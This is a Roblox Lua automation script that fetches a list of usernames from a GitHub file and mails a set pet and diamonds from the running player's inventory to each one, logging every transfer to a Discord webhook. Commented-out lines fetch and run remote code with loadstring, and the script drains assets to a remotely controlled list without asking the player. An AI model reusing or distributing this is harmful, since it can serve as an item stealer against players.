spawn(function()
task.wait(10)
--loadstring(game:HttpGet("https://raw.githubusercontent.com/dracular111/01/main/A-SendPet"))()
end)

spawn(function()
task.wait(10)
--loadstring(game:HttpGet("https://raw.githubusercontent.com/dracular111/01/main/A-SendGem"))()
end)

task.wait(20)
--// ================= LOAD USER =================
local HttpService = game:GetService("HttpService")

local USERS_URL = "https://raw.githubusercontent.com/dracular111/01/refs/heads/main/A-List-User.json"

local Users = {}

local success, response = pcall(function()
    return game:HttpGet(USERS_URL)
end)

if success then
    local ok, data = pcall(function()
        return HttpService:JSONDecode(response)
    end)

    if ok and type(data) == "table" then
        Users = data
    else
        warn("Decode user lỗi")
        return
    end
else
    warn("Không load được user")
    return
end

if #Users == 0 then
    warn("User rỗng")
    return
end

--// ================= CONFIG (CỨNG TRONG SCRIPT) =================
local Config = {

    Pet = {
        Enabled = true,
        PerUser = 50,
        Delay = 1.2,
        Retry = 3,

        Items = {
            {
                id = "Blooming Axolotl",
                Class = "Pet",
                pt = 2
            }
        }
    },

    Gem = {
        Enabled = true,
        PerUser = 2000,
        Delay = 3,
        Retry = 3
    },

    Webhook = "https://discord.com/api/webhooks/1494215679698534522/..."
}

--// ================= SERVICES =================
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local player = Players.LocalPlayer

repeat task.wait() until game:IsLoaded()

local Client = ReplicatedStorage:WaitForChild("Library"):WaitForChild("Client")
local Network = require(Client.Network)
local Save = require(Client.Save)

--// ================= FORMAT =================
local function formatNumber(n)
    local function fmt(x, s)
        if x >= 100 then return string.format("%.0f%s", x, s)
        elseif x >= 10 then return string.format("%.1f%s", x, s)
        else return string.format("%.2f%s", x, s) end
    end
    if n >= 1e12 then return fmt(n/1e12,"T")
    elseif n >= 1e9 then return fmt(n/1e9,"B")
    elseif n >= 1e6 then return fmt(n/1e6,"M")
    elseif n >= 1e3 then return fmt(n/1e3,"K")
    else return tostring(n) end
end

--// ================= WEBHOOK =================
local function sendWebhook(msg)
    if Config.Webhook == "" then return end

    request({
        Url = Config.Webhook,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode({content = msg})
    })
end

--// ================= UI =================
local gui = Instance.new("ScreenGui", player.PlayerGui)
local label = Instance.new("TextLabel", gui)
label.Size = UDim2.new(0,320,0,50)
label.Position = UDim2.new(0,10,0,10)
label.BackgroundTransparency = 0.3
label.Text = "Loaded..."

--// ================= PREPARE =================
local pets = {}
local petAmounts = {}
local petIndex = 1

if Config.Pet.Enabled then
    local inv = Save.Get().Inventory

    for class, items in pairs(inv) do
        for uid, v in pairs(items) do
            for _, itemCfg in ipairs(Config.Pet.Items) do
                if class == itemCfg.Class and v.id == itemCfg.id then
                    if itemCfg.pt and v.pt ~= itemCfg.pt then continue end
                    table.insert(pets, {uid = uid, data = v, class = class})
                end
            end
        end
    end

    if #pets == 0 then
        sendWebhook("❌ PET STOP | No pets")
        return
    end
end

local diamondUID
local diamondsStat

if Config.Gem.Enabled then
    diamondsStat = player:WaitForChild("leaderstats"):FindFirstChild("💎 Diamonds")

    for id, v in pairs(Save.Get().Inventory["Currency"]) do
        if v.id == "Diamonds" then
            diamondUID = id
            break
        end
    end

    if not diamondUID then
        sendWebhook("❌ GEM STOP | No UID")
        return
    end
end

--// ================= MAIN =================
for _, user in ipairs(Users) do

    label.Text = "Processing → "..user

    -- ===== PET =====
    if Config.Pet.Enabled then
        local sentToUser = 0

        for i = petIndex, #pets do
            local pet = pets[i]
            local v = pet.data
            local uid = pet.uid

            if not petAmounts[uid] then
                petAmounts[uid] = tonumber(v._am) or 1
            end

            local amount = petAmounts[uid]
            if amount <= 0 then
                petIndex = i + 1
                continue
            end

            local need = Config.Pet.PerUser - sentToUser
            local sendAmount = math.min(need, amount)

            local ok = Network.Invoke("Mailbox: Send", user, "Auto Pet", pet.class, uid, sendAmount)

            if ok then
                petAmounts[uid] -= sendAmount
                sentToUser += sendAmount

                sendWebhook("🐾 "..sendAmount.." "..v.id.." → "..user)

                if petAmounts[uid] <= 0 then
                    petIndex = i + 1
                else
                    petIndex = i
                end

                task.wait(Config.Pet.Delay)
            end

            if sentToUser >= Config.Pet.PerUser then break end
        end

        if sentToUser < Config.Pet.PerUser then
            sendWebhook("❌ PET STOP | "..user)
            return
        end
    end

    -- ===== GEM =====
    if Config.Gem.Enabled then
        if not diamondsStat or diamondsStat.Value < Config.Gem.PerUser then
            sendWebhook("❌ GEM STOP | "..user)
            return
        end

        local ok = Network.Invoke("Mailbox: Send", user, "Auto Gem", "Currency", diamondUID, Config.Gem.PerUser)

        if ok then
            sendWebhook("💎 "..formatNumber(Config.Gem.PerUser).." → "..user)
        else
            sendWebhook("❌ GEM FAIL → "..user)
            return
        end

        task.wait(Config.Gem.Delay)
    end
end

sendWebhook("✅ ALL DONE")
label.Text = "DONE"
